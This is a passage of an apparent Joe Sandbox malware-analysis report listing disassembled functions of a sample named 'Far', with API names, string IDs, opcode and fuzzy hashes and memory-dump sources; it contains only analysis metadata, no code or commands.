                                                                                                                                                                      • Opcode ID: e14b2db2c6283d98dab0a8685c259970414987b03382c445c93d418f026a7faf
                                                                                                                                                                      • Instruction ID: d3845135f28d0b5d114d97e1d903dd1d1307edb42138f738536480079119c417
                                                                                                                                                                      • Opcode Fuzzy Hash: e14b2db2c6283d98dab0a8685c259970414987b03382c445c93d418f026a7faf
                                                                                                                                                                      • Instruction Fuzzy Hash: F161E326A0C94FA6E734BBA194503BAA711FF88FA4F948035D96D066D1EF7CE441A330
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                      • API String ID: 3721556410-2107944366
                                                                                                                                                                      • Opcode ID: 97ef0b700df61ad5308a7d3f9d8e965a8498eee521ee6822d8ac151ff3cc546f
                                                                                                                                                                      • Instruction ID: bb89b03e10628c2d4425d08c3027db47bcab26576d237d1a8fdfcc4d8c401625
                                                                                                                                                                      • Opcode Fuzzy Hash: 97ef0b700df61ad5308a7d3f9d8e965a8498eee521ee6822d8ac151ff3cc546f
                                                                                                                                                                      • Instruction Fuzzy Hash: 5E61E232A08A5AA5EB00FFA1E8845ED7774FB44B88FD00032ED1D13AA5EF39D449D720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                                                                      • API String ID: 1701285019-2896544425
                                                                                                                                                                      • Opcode ID: 420af2fcfa7bb0eae6f8d95c1fd7ddabf97753f1d1f6881c009eb16056507c85
                                                                                                                                                                      • Instruction ID: 7991ac6ada40060dc84856109ce30c88f7003d3b4e34c37ba6f73d711efa76fa
                                                                                                                                                                      • Opcode Fuzzy Hash: 420af2fcfa7bb0eae6f8d95c1fd7ddabf97753f1d1f6881c009eb16056507c85
                                                                                                                                                                      • Instruction Fuzzy Hash: 04519262A0C25AA2EB04FFA6C5A437DABA0FF84F44F858431DA0D03252EF3CD4059B20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconLoad_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                                                                      • API String ID: 4060274358-404129466
                                                                                                                                                                      • Opcode ID: d1a75cea2c5cc2fa01692c85f84196dc14653c098586b10a1b80e983dbda5b2d
                                                                                                                                                                      • Instruction ID: d6d7092e3b67d11c40acc4b279673066efefa18cca0ec120e79b9db576fcab19
                                                                                                                                                                      • Opcode Fuzzy Hash: d1a75cea2c5cc2fa01692c85f84196dc14653c098586b10a1b80e983dbda5b2d
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E216221B0C78BA2FA21BB95B8506BAE751AF54F80FC44035DD4D47799FFBCE441A620
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                      • API String ID: 4051287042-3128320259
                                                                                                                                                                      • Opcode ID: e512a0270436ce9eaad3688259e2a790ec3cc9f55dcbd2e9a693a545aeb19a76
                                                                                                                                                                      • Instruction ID: a601db7dba69e0aa5dc25b23216daa3c3f1fc1c586f8a5feb265935b0bfe569d
                                                                                                                                                                      • Opcode Fuzzy Hash: e512a0270436ce9eaad3688259e2a790ec3cc9f55dcbd2e9a693a545aeb19a76
                                                                                                                                                                      • Instruction Fuzzy Hash: 3F11657171DB86A1D734AB90F4807EEA364FB48B44FD00436D68E42654EF7CD149D760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2550207440-0
                                                                                                                                                                      • Opcode ID: ca8bd74eda99ae4a02718a2d0e70d01010210e65895fe1a450aa3131833b566d
                                                                                                                                                                      • Instruction ID: 14c64d9d4c03f9bc01801542ac1ba94a2eca1436e45e17ee6fa6c45a687d1741
                                                                                                                                                                      • Opcode Fuzzy Hash: ca8bd74eda99ae4a02718a2d0e70d01010210e65895fe1a450aa3131833b566d
                                                                                                                                                                      • Instruction Fuzzy Hash: CBA1AD22A0C60AA5FB14AFE5C4943FCA760EB44F84F954031DE4D4B295EF7CE449E362
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                      • Opcode ID: a9e461c7fc002a9558b315f25b571deae9464d7729ec8a03eb2e8c6bfcc3fc89
                                                                                                                                                                      • Instruction ID: 9d2a0e226acac04f3ca9ca1a5d81abfff9d6310276c24f70bc499eca9bfba0b8
                                                                                                                                                                      • Opcode Fuzzy Hash: a9e461c7fc002a9558b315f25b571deae9464d7729ec8a03eb2e8c6bfcc3fc89
                                                                                                                                                                      • Instruction Fuzzy Hash: AA51F292A0D2D566F771ABB2610077EAF61FB46FC0FC88074DAC917B42DF29E4549320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                                                                                                                                      • String ID: DllGetClassObject
                                                                                                                                                                      • API String ID: 668425406-1075368562
                                                                                                                                                                      • Opcode ID: 17d9e9d3772de8db0aef5cb29927a9cee40c9631e4a3a58e5dfc936e324a3f9a
                                                                                                                                                                      • Instruction ID: 8a0c93539b884c5ca770d83b5177c381f205a1a1a6f5a4b354fcf6d17b591480
                                                                                                                                                                      • Opcode Fuzzy Hash: 17d9e9d3772de8db0aef5cb29927a9cee40c9631e4a3a58e5dfc936e324a3f9a
                                                                                                                                                                      • Instruction Fuzzy Hash: 2D518F72A0CB4AA6EB04AF96E5483B9A360FB44F84F944438DB4D47A90EF7CF055D720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 161812096-0
                                                                                                                                                                      • Opcode ID: 26e3994c2a94f759fd11c1c9e4930c6f2fd4acea68fe4f08665ed193a3f9ccf9
                                                                                                                                                                      • Instruction ID: 9ac7af8896952d88729b39524a874f286ab793abcb7d93c1c6a13bfc24aab75c
                                                                                                                                                                      • Opcode Fuzzy Hash: 26e3994c2a94f759fd11c1c9e4930c6f2fd4acea68fe4f08665ed193a3f9ccf9
                                                                                                                                                                      • Instruction Fuzzy Hash: F1416E36A0AE0995EB50DFA6D8846AD77B4FB48F84FA44031DE0E13764EF38D485D710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                      • Opcode ID: 942b8caec823025370203f03ab39f9150ac8ee590f7a4993320e500af7a20746
                                                                                                                                                                      • Instruction ID: c450127faa7dfed5df51ec20a8570f2b444a6e7e6a267aecd6c937688b414c7e
                                                                                                                                                                      • Opcode Fuzzy Hash: 942b8caec823025370203f03ab39f9150ac8ee590f7a4993320e500af7a20746
                                                                                                                                                                      • Instruction Fuzzy Hash: 33317221B0DB4995EA64AF92E48827DB3A4FB84FD0FD84236DA5D47790EF3CE4459310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocByteCharMultiStringWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3603722519-0
                                                                                                                                                                      • Opcode ID: cf27336f202e1e338ba4465162c754a44080f01d8b1ceb11d940affce2d9ab9d
                                                                                                                                                                      • Instruction ID: c81ce9e2d017cae6f9309d8165d26c367fbf249d5fe54f36c741b087d4f6fe0c
                                                                                                                                                                      • Opcode Fuzzy Hash: cf27336f202e1e338ba4465162c754a44080f01d8b1ceb11d940affce2d9ab9d
                                                                                                                                                                      • Instruction Fuzzy Hash: BF31B061B0DB4999EB20AF92E44827DB3A4FB44F90F984236DA5D03790EF3CE4859710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                                                                                      • Opcode ID: 91376e81e880bb7d3a9e21fc8dc8f7f7e105a4c754061995173df5af5231e3bf
                                                                                                                                                                      • Instruction ID: 4f055ef31299b935fef0fc82138c25b8a29473e88d15a0bc6ea5a6615f9ca1a6
                                                                                                                                                                      • Opcode Fuzzy Hash: 91376e81e880bb7d3a9e21fc8dc8f7f7e105a4c754061995173df5af5231e3bf
                                                                                                                                                                      • Instruction Fuzzy Hash: 87318B3260C68597E7609FA5F494B5AB761EB88B90F909139EB8803F58DF3CD445CF10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                      • String ID: SCRIPT
                                                                                                                                                                      • API String ID: 3051347437-3967369404
                                                                                                                                                                      • Opcode ID: 8bf760f3bb4dc68625970595111e6d0102ca7a7f49d6a03fa82138f85f5ee199
                                                                                                                                                                      • Instruction ID: 3e1d1398fd9a83cdff0bbd0010b81fdece3e5cdff7a14d2201fea28bc4686ed1
                                                                                                                                                                      • Opcode Fuzzy Hash: 8bf760f3bb4dc68625970595111e6d0102ca7a7f49d6a03fa82138f85f5ee199
                                                                                                                                                                      • Instruction Fuzzy Hash: 87219D32A1DB4582EB509B62E088769A3A0FB88F84F544035DE4E47B54EF3DE405D710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3859894641-0
                                                                                                                                                                      • Opcode ID: c8d7e71b8f4c7d771651c364d0d3143786a73332e9fbc6e0fb61ee9492127992
                                                                                                                                                                      • Instruction ID: e8c065f65aed91f8a3823d3e005adbe9e10e071b32082c1ff1f870d9a8b987b1
                                                                                                                                                                      • Opcode Fuzzy Hash: c8d7e71b8f4c7d771651c364d0d3143786a73332e9fbc6e0fb61ee9492127992
                                                                                                                                                                      • Instruction Fuzzy Hash: 26718132A3C24AA1EA25BFA591540BDE760EF45F80F848136D74E0B799FF6DE411A330
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$Item$CountMessagePostString
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 650687236-0
                                                                                                                                                                      • Opcode ID: b796405f2cf8fa748deec6b5a619f8a4111013f974b6ff877e412ca8b10cd198
                                                                                                                                                                      • Instruction ID: c6930f060d52ddff8256d5c79ac56c01f4767f0a635f42f5b677de089b0bd1be
                                                                                                                                                                      • Opcode Fuzzy Hash: b796405f2cf8fa748deec6b5a619f8a4111013f974b6ff877e412ca8b10cd198
                                                                                                                                                                      • Instruction Fuzzy Hash: 4E618F62A0CA8A91EB50EB96E4505AEB760FB88FC4F844031EE8E47795EF3CD4409710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 564229958-0
                                                                                                                                                                      • Opcode ID: 7c7196d17c6f36e09549358166ae616dcc8993101c7ef4dcbdd2504e62250dc8
                                                                                                                                                                      • Instruction ID: 8c3f7ba59b7aa95ba9abf6afad1e407c90dd70967bf0e7462d862ad2a62c2613
                                                                                                                                                                      • Opcode Fuzzy Hash: 7c7196d17c6f36e09549358166ae616dcc8993101c7ef4dcbdd2504e62250dc8
                                                                                                                                                                      • Instruction Fuzzy Hash: 72514472A1C686A5EB24FFA0D4402EDA364FB90F84FC04032E64D57599FFA8D749D760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
